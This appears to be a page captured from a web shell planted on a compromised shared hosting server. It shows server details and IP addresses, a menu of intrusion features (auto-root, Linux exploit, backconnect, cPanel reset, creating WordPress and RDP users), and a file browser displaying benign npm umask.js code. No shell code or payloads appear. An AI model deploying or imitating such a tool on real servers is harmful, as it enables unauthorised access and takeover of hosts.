Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.191.239.181
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
alt-nodejs16 /
root /
usr /
lib /
node_modules /
npm /
node_modules.bundled /
@npmcli /
config /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
env-replace.js
414
B
-rw-r--r--
index.js
27.69
KB
-rw-r--r--
nerf-dart.js
450
B
-rw-r--r--
parse-field.js
2.08
KB
-rw-r--r--
set-envs.js
3.44
KB
-rw-r--r--
type-defs.js
1.31
KB
-rw-r--r--
type-description.js
574
B
-rw-r--r--
umask.js
691
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : umask.js
class Umask {} const parse = val => { if (typeof val === 'string') { if (/^0o?[0-7]+$/.test(val)) { return parseInt(val.replace(/^0o?/, ''), 8) } else if (/^[1-9][0-9]*$/.test(val)) { return parseInt(val, 10) } else { throw new Error(`invalid umask value: ${val}`) } } if (typeof val !== 'number') { throw new Error(`invalid umask value: ${val}`) } val = Math.floor(val) if (val < 0 || val > 511) { throw new Error(`invalid umask value: ${val}`) } return val } const validate = (data, k, val) => { try { data[k] = parse(val) return true } catch (er) { return false } } module.exports = { Umask, parse, validate }
Close